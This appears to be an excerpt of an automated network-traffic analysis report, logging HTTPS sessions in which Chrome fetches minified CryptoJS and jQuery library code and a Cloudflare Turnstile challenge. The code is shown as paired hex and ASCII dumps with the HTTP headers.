                                                        2024-09-13 13:06:33 UTC1369INData Raw: 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63
                                                        Data Ascii: eof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.c
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74
                                                        Data Ascii: e.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomByt
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61
                                                        Data Ascii: typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e
                                                        Data Ascii: r(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49
                                                        Data Ascii: 0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79
                                                        Data Ascii: fer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e
                                                        Data Ascii: .charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMN
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74
                                                        Data Ascii: s(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=t
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35
                                                        Data Ascii: 9]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.549734151.101.194.1374433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:32 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                        Host: code.jquery.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:33 UTC611INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Length: 89501
                                                        Server: nginx
                                                        Content-Type: application/javascript; charset=utf-8
                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                        ETag: "28feccc0-15d9d"
                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                        Access-Control-Allow-Origin: *
                                                        Cross-Origin-Resource-Policy: cross-origin
                                                        Via: 1.1 varnish, 1.1 varnish
                                                        Accept-Ranges: bytes
                                                        Date: Fri, 13 Sep 2024 13:06:33 GMT
                                                        Age: 2424576
                                                        X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890083-NYC
                                                        X-Cache: HIT, HIT
                                                        X-Cache-Hits: 55, 7
                                                        X-Timer: S1726232793.050614,VS0,VE0
                                                        Vary: Accept-Encoding
                                                        2024-09-13 13:06:33 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                        2024-09-13 13:06:33 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                        Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                        2024-09-13 13:06:33 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                        Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                        2024-09-13 13:06:33 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                        Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                        2024-09-13 13:06:33 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                        Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                        2024-09-13 13:06:33 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                        Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.549739104.18.94.414433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:33 UTC800OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/eexie/0x4AAAAAAAgfyeXMLVB_Rwr6/auto/fbE/normal/auto/ HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: iframe
                                                        Referer: https://saj.mordantif.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:33 UTC1369INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:06:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 164870
                                                        Connection: close
                                                        cross-origin-embedder-policy: require-corp
                                                        permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                        content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                        accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                        cross-origin-opener-policy: same-origin
                                                        cross-origin-resource-policy: cross-origin
                                                        document-policy: js-profiling
                                                        referrer-policy: same-origin
                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                        origin-agent-cluster: ?1
                                                        2024-09-13 13:06:33 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 32 38 35 61 65 66 62 66 39 37 31 38 32 31 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                        Data Ascii: Server: cloudflareCF-RAY: 8c285aefbf971821-EWRalt-svc: h3=":443"; ma=86400
